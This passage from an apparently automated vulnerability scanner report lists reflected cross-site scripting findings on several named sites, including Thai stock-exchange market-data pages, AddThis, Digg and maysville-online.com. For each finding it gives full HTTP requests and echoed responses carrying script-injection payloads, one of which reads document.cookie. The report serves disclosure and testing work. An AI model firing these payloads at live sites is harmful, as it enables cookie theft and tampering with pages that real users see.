GET /red/psi/sites/marketdata.set.or.th/p.json?callback=_ate.ad.hpra2176<script>alert(1)</script>9e9fd4c751b&uid=4dc048d9159e4ae3&url=http%3A%2F%2Fmarketdata.set.or.th%2Fmkt%2Fstockquotation.do%3Fsymbol%3DSCCC%26language%3Den%26country%3DUS&ref=http%3A%2F%2Fmarketdata.set.or.th%2Fmkt%2Fsectorquotation.do%3Fmarket%3DA%26industry%3D0%26sector%3D90%26language%3Den%26country%3DUS&jcr2sg HTTP/1.1
Host: ds.addthis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh41.html
Cookie: uid=4dc048d9159e4ae3; uit=1; psc=4; loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; dt=X; di=%7B%7D..1304431085.1FE|1304431085.1OD|1304431085.60

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 131
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Tue, 03 May 2011 14:54:33 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Thu, 02 Jun 2011 14:54:33 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Tue, 03 May 2011 14:54:33 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 03 May 2011 14:54:33 GMT
Connection: close

_ate.ad.hpra2176<script>alert(1)</script>9e9fd4c751b({"urls":[],"segments" : [],"loc": "MjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg=="})

2.2. http://ds.addthis.com/red/psi/sites/www.set.or.th/p.json [callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ds.addthis.com
Path:	/red/psi/sites/www.set.or.th/p.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 19242<script>alert(1)</script>a6e75e8d76b was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /red/psi/sites/www.set.or.th/p.json?callback=_ate.ad.hpr19242<script>alert(1)</script>a6e75e8d76b&uid=4dc048d9159e4ae3&url=http%3A%2F%2Fwww.set.or.th%2Fset%2Fxcalendar.do%3Flanguage%3Den%26country%3DUS&ref=http%3A%2F%2Fwww.set.or.th%2Fen%2Findex.html&ngehbb HTTP/1.1
Host: ds.addthis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh41.html
Cookie: uid=4dc048d9159e4ae3; uit=1; psc=4; loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; dt=X; di=%7B%7D..1304431085.1FE|1304431085.1OD|1304431085.60

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 131
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Tue, 03 May 2011 14:24:05 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Thu, 02 Jun 2011 14:24:05 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Tue, 03 May 2011 14:24:05 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 03 May 2011 14:24:05 GMT
Connection: close

_ate.ad.hpr19242<script>alert(1)</script>a6e75e8d76b({"urls":[],"segments" : [],"loc": "MjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg=="})

2.3. http://marketdata.set.or.th/mkt/ftsequotation.do [country parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://marketdata.set.or.th
Path:	/mkt/ftsequotation.do

Issue detail

The value of the country request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 386d3"><script>alert(1)</script>f29aa971d4 was submitted in the country parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mkt/ftsequotation.do?indexID=FSTHL&language=en&country=US386d3"><script>alert(1)</script>f29aa971d4 HTTP/1.1
Host: marketdata.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://marketdata.set.or.th/static/market/set/indextab_en_US.html
Cookie: verify=test; JSESSIONID=C79B035F62797B23B65F20B1E721575B; _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=213194248.998969890.1304449190.1304449190.1304449190.1; __utmb=213194248; __utmc=213194248; __utmz=213194248.1304449190.1.1.utmccn=(referral)|utmcsr=set.or.th|utmcct=/en/sitemap/for_listing.html|utmcmd=referral

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 15:09:21 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=tis-620
Content-Length: 56569

<html>
<head>
<link href="/mkt/styles/setstyle.css" rel="stylesheet" type="text/css">
<link href="/menuFile/framework.css" rel="stylesheet" type="text/css">
<link href="/menuFile/menu.
...[SNIP]...
<a href="stockquotation.do?symbol=ADVANC&language=en&country=US386D3"><SCRIPT>ALERT(1)</SCRIPT>F29AA971D4">
...[SNIP]...

2.4. http://marketdata.set.or.th/mkt/ftsequotation.do [language parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://marketdata.set.or.th
Path:	/mkt/ftsequotation.do

Issue detail

The value of the language request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a6431"><script>alert(1)</script>eeddc68c0a9 was submitted in the language parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mkt/ftsequotation.do?indexID=FSTHL&language=ena6431"><script>alert(1)</script>eeddc68c0a9&country=US HTTP/1.1
Host: marketdata.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://marketdata.set.or.th/static/market/set/indextab_en_US.html
Cookie: verify=test; JSESSIONID=C79B035F62797B23B65F20B1E721575B; _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=213194248.998969890.1304449190.1304449190.1304449190.1; __utmb=213194248; __utmc=213194248; __utmz=213194248.1304449190.1.1.utmccn=(referral)|utmcsr=set.or.th|utmcct=/en/sitemap/for_listing.html|utmcmd=referral

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 14:57:21 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=tis-620
Content-Length: 56570

<html>
<head>
<link href="/mkt/styles/setstyle.css" rel="stylesheet" type="text/css">
<link href="/menuFile/framework.css" rel="stylesheet" type="text/css">
<link href="/menuFile/menu.
...[SNIP]...
<a href="stockquotation.do?symbol=ADVANC&language=ena6431"><script>alert(1)</script>eeddc68c0a9&country=US">
...[SNIP]...

2.5. http://marketdata.set.or.th/mkt/sectorquotation.do [country parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://marketdata.set.or.th
Path:	/mkt/sectorquotation.do

Issue detail

The value of the country request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb0b0"><script>alert(1)</script>b3ae44537a6 was submitted in the country parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mkt/sectorquotation.do?market=A&industry=0&sector=90&language=en&country=USeb0b0"><script>alert(1)</script>b3ae44537a6 HTTP/1.1
Host: marketdata.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://marketdata.set.or.th/static/market/set/indextab_en_US.html
Cookie: verify=test; JSESSIONID=C79B035F62797B23B65F20B1E721575B; _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=213194248.998969890.1304449190.1304449190.1304449190.1; __utmb=213194248; __utmc=213194248; __utmz=213194248.1304449190.1.1.utmccn=(referral)|utmcsr=set.or.th|utmcct=/en/sitemap/for_listing.html|utmcmd=referral

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 15:18:12 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=tis-620
Content-Length: 109043

<html>
<head>
<link href="/mkt/styles/setstyle.css" rel="stylesheet" type="text/css">
<link href="/menuFile/framework.css" rel="stylesheet" type="text/css">
<link href="/menuFile/menu.
...[SNIP]...
<a href="stockquotation.do?symbol=ADVANC&language=en&country=USEB0B0"><SCRIPT>ALERT(1)</SCRIPT>B3AE44537A6">
...[SNIP]...

2.6. http://marketdata.set.or.th/mkt/sectorquotation.do [language parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://marketdata.set.or.th
Path:	/mkt/sectorquotation.do

Issue detail

The value of the language request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5df96"><script>alert(1)</script>7b2e073ff60 was submitted in the language parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mkt/sectorquotation.do?market=A&industry=0&sector=90&language=en5df96"><script>alert(1)</script>7b2e073ff60&country=US HTTP/1.1
Host: marketdata.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://marketdata.set.or.th/static/market/set/indextab_en_US.html
Cookie: verify=test; JSESSIONID=C79B035F62797B23B65F20B1E721575B; _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=213194248.998969890.1304449190.1304449190.1304449190.1; __utmb=213194248; __utmc=213194248; __utmz=213194248.1304449190.1.1.utmccn=(referral)|utmcsr=set.or.th|utmcct=/en/sitemap/for_listing.html|utmcmd=referral

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 15:05:39 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=tis-620
Set-Cookie: JSESSIONID=B636F26EA9AD0CA850DD3EBF63B339E0; Path=/mkt
Content-Length: 109006

<html>
<head>
<link href="/mkt/styles/setstyle.css" rel="stylesheet" type="text/css">
<link href="/menuFile/framework.css" rel="stylesheet" type="text/css">
<link href="/menuFile/menu.
...[SNIP]...
<a href="stockquotation.do?symbol=ADVANC&language=en5df96"><script>alert(1)</script>7b2e073ff60&country=US">
...[SNIP]...

2.7. http://widgets.digg.com/buttons/count [url parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://widgets.digg.com
Path:	/buttons/count

Issue detail

The value of the url request parameter is copied into the HTML document as plain text between tags. The payload 89a1b<script>alert(1)</script>2da281c1551 was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /buttons/count?url=http%3A//xss.cx/2011/05/03/dork/reflected-xss-cross-site-scripting-cwe79-capec86-ghdb-olb2nationetcom.htm89a1b<script>alert(1)</script>2da281c1551 HTTP/1.1
Host: widgets.digg.com
Proxy-Connection: keep-alive
Referer: http://xss.cx/2011/05/03/dork/reflected-xss-cross-site-scripting-cwe79-capec86-ghdb-olb2nationetcom.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d=fb1af30888f0820a9f09d171b75eb93394e3b17bd833ffed352d5b5c4836e393; __utmz=146621099.1304250250.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vnum=1306842255367%26vn%3D1; s_vi=[CS]v1|26DEA3D10501174B-40000100A00037A2[CE]; __utma=146621099.2000529129.1304250250.1304250250.1304250250.1; s_nr=1304250295878

Response

HTTP/1.1 200 OK
Age: 0
Date: Tue, 03 May 2011 15:08:24 GMT
Via: NS-CACHE: 100
Etag: "7b8c1659e8aa8a38abd5452792d3c1d649079e7f"
Content-Length: 188
Server: TornadoServer/0.1
Content-Type: application/json
Accept-Ranges: bytes
Cache-Control: private, max-age=599
Expires: Tue, 03 May 2011 15:18:23 GMT
X-CDN: Cotendo
Connection: Keep-Alive

__DBW.collectDiggs({"url": "http://xss.cx/2011/05/03/dork/reflected-xss-cross-site-scripting-cwe79-capec86-ghdb-olb2nationetcom.htm89a1b<script>alert(1)</script>2da281c1551", "diggs": 0});

2.8. http://www.maysville-online.com/app/scripts/ajaxModules/'+upickemDeals[0][2]+' [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.maysville-online.com
Path:	/app/scripts/ajaxModules/'+upickemDeals[0][2]+'

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 91108"%3b8e42e53bc97 was submitted in the REST URL parameter 1. This input was echoed as 91108";8e42e53bc97 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /app91108"%3b8e42e53bc97/scripts/ajaxModules/'+upickemDeals[0][2]+' HTTP/1.1
Host: www.maysville-online.com
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/app/scripts/ajaxModules/upickemDeal.php?domain=http://maysville.upickem.net&id=27231&bg=eee&headerBg=330066&headerColor=FF4A00&countColor=FF4A00c8fc6'%3balert(document.cookie)//110369244fe&regLink=true&title=&upickemSignup=&limit=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TNNoMobile=1

Response (redirected)

HTTP/1.1 404 Not Found
Server: WWW
Vary: Accept-Encoding
X-TNCMS-Memory-Usage: 4681716
Content-Type: text/html; charset=UTF-8
X-TNCMS-Venue: app
Date: Tue, 03 May 2011 17:36:49 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
X-TNCMS-Version: 1.7.9
X-TNCMS-Render-Time: 0.9526
X-PHP-Engine: enabled
Connection: Keep-Alive
X-Cache-Info: caching
Real-Hostname: maysville-online.com
X-TNCMS-Served-By: cmsapp10
Content-Length: 35372

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xm
...[SNIP]...
<!--
           s.pageName="http://maysville-online.com/app91108";8e42e53bc97/scripts/ajaxmodules/'+upickemdeals[0][2]+'/"
           s.server="Maysville"
           s.channel="maysville-online.com"
           s.pageType=""
           s.prop1="homepage"
           s.prop2=""
           s.prop3=""
           s.prop4=""
           s.prop5=""

...[SNIP]...

2.9. http://www.maysville-online.com/app/scripts/ajaxModules/'+upickemDeals[0][2]+' [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.maysville-online.com
Path:	/app/scripts/ajaxModules/'+upickemDeals[0][2]+'

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f1ae6"style%3d"x%3aexpression(alert(1))"cdd99634af6 was submitted in the REST URL parameter 1. This input was echoed as f1ae6"style="x:expression(alert(1))"cdd99634af6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /appf1ae6"style%3d"x%3aexpression(alert(1))"cdd99634af6/scripts/ajaxModules/'+upickemDeals[0][2]+' HTTP/1.1
Host: www.maysville-online.com
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/app/scripts/ajaxModules/upickemDeal.php?domain=http://maysville.upickem.net&id=27231&bg=eee&headerBg=330066&headerColor=FF4A00&countColor=FF4A00c8fc6'%3balert(document.cookie)//110369244fe&regLink=true&title=&upickemSignup=&limit=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TNNoMobile=1

Response (redirected)

HTTP/1.1 404 Not Found
Server: WWW
Vary: Accept-Encoding
X-TNCMS-Memory-Usage: 4682236
Content-Type: text/html; charset=UTF-8
X-TNCMS-Venue: app
Date: Tue, 03 May 2011 17:36:46 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
X-TNCMS-Version: 1.7.9
X-TNCMS-Render-Time: 0.7744
X-PHP-Engine: enabled
Connection: Keep-Alive
X-Cache-Info: caching
Real-Hostname: maysville-online.com
X-TNCMS-Served-By: cmsapp8
Content-Length: 35430

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xm
...[SNIP]...
<a href="https://www-dot-maysville-online-dot-com.bloxcms.com/users/login/?referer_url=/appf1ae6"style="x:expression(alert(1))"cdd99634af6/scripts/ajaxmodules/'+upickemdeals[0][2]+'/">
...[SNIP]...

2.10. http://www.maysville-online.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.maysville-online.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1b6cb"style%3d"x%3aexpression(alert(1))"f2c27b9491d was submitted in the REST URL parameter 1. This input was echoed as 1b6cb"style="x:expression(alert(1))"f2c27b9491d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /1b6cb"style%3d"x%3aexpression(alert(1))"f2c27b9491d HTTP/1.1
Host: www.maysville-online.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TNNoMobile=1

Response (redirected)

HTTP/1.1 404 Not Found
Server: WWW
Vary: Accept-Encoding
X-TNCMS-Memory-Usage: 4680728
Content-Type: text/html; charset=UTF-8
X-TNCMS-Venue: app
Date: Tue, 03 May 2011 17:37:42 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
X-TNCMS-Version: 1.7.9
X-TNCMS-Render-Time: 0.3497
X-PHP-Engine: enabled
Connection: Keep-Alive
X-Cache-Info: caching
Real-Hostname: maysville-online.com
X-TNCMS-Served-By: cmsapp11
Content-Length: 35419

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xm
...[SNIP]...
<a href="https://www-dot-maysville-online-dot-com.bloxcms.com/users/login/?referer_url=/1b6cb"style="x:expression(alert(1))"f2c27b9491d/">
...[SNIP]...

2.11. http://www.maysville-online.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.maysville-online.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 900c9"%3beb93d066cd8 was submitted in the REST URL parameter 1. This input was echoed as 900c9";eb93d066cd8 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Request

GET /900c9"%3beb93d066cd8 HTTP/1.1
Host: www.maysville-online.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TNNoMobile=1

Response (redirected)

HTTP/1.1 404 Not Found
Server: WWW
Vary: Accept-Encoding
X-TNCMS-Memory-Usage: 4680360
Content-Type: text/html; charset=UTF-8
X-TNCMS-Venue: app
Date: Tue, 03 May 2011 17:37:44 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
X-TNCMS-Version: 1.7.9
X-TNCMS-Render-Time: 0.8064
X-PHP-Engine: enabled
Connection: Keep-Alive
X-Cache-Info: caching
Real-Hostname: maysville-online.com
X-TNCMS-Served-By: cmsapp1
Content-Length: 35232

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xm
...[SNIP]...
<!--
           s.pageName="http://maysville-online.com/900c9";eb93d066cd8/"
           s.server="Maysville"
           s.channel="maysville-online.com"
           s.pageType=""
           s.prop1="homepage"
           s.prop2=""
           s.prop3=""
           s.prop4=""
           s.prop5=""
           s.prop6=""
           s.prop7=""
           s.prop8=""

...[SNIP]...

2.12. http://www.maysville-online.com/favicon.ico [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.maysville-online.com
Path:	/favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 62c9c"-alert(1)-"4fe59664ce4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /favicon.ico?62c9c"-alert(1)-"4fe59664ce4=1 HTTP/1.1
Host: www.maysville-online.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TNNoMobile=1

Response

HTTP/1.1 404 Not Found
Server: WWW
Vary: Accept-Encoding
X-TNCMS-Memory-Usage: 4639572
Content-Type: text/html; charset=UTF-8
X-TNCMS-Venue: app
Date: Tue, 03 May 2011 17:36:56 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
X-TNCMS-Version: 1.7.9
X-TNCMS-Render-Time: 0.3962
X-PHP-Engine: enabled
Connection: Keep-Alive
X-Cache-Info: caching
Real-Hostname: maysville-online.com
X-TNCMS-Served-By: cmsapp3
Content-Length: 35329

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xm
...[SNIP]...
<!--
           s.pageName="http://maysville-online.com/favicon.ico?62c9c"-alert(1)-"4fe59664ce4=1"
           s.server="Maysville"
           s.channel="maysville-online.com"
           s.pageType=""
           s.prop1="homepage"
           s.prop2=""
           s.prop3=""
           s.prop4=""
           s.prop5=""
           s.prop6=""
           s.prop7=""
           s.prop8=""

...[SNIP]...

2.13. http://www.moneychannel.co.th/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.moneychannel.co.th
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5417"><a>0378911d08b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /?f5417"><a>0378911d08b=1 HTTP/1.1
Host: www.moneychannel.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.set.or.th/en/contact/contact.html

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 14:33:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Set-Cookie: .ASPXANONYMOUS=Acw*9i8pifY0OWRmZDJmMi0zZTgxLTQ3YzYtYjVjNy0xNmE2YWQwNGNlM2I1; expires=Tue, 12-Jul-2011 01:13:07 GMT; path=/;HttpOnly
Set-Cookie: language=en-US; path=/;HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 143657

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
   <HEAD id="Head">
       <TITLE>
           Money Channel ...............................................................................
...[SNIP]...
<form name="Form" method="post" action="/Default.aspx?f5417"><a>0378911d08b=1" id="Form" enctype="multipart/form-data" style="height:100%;">
...[SNIP]...

2.14. http://www.sec.or.th/view/truehitsstat.jsp [pagename parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sec.or.th
Path:	/view/truehitsstat.jsp

Issue detail

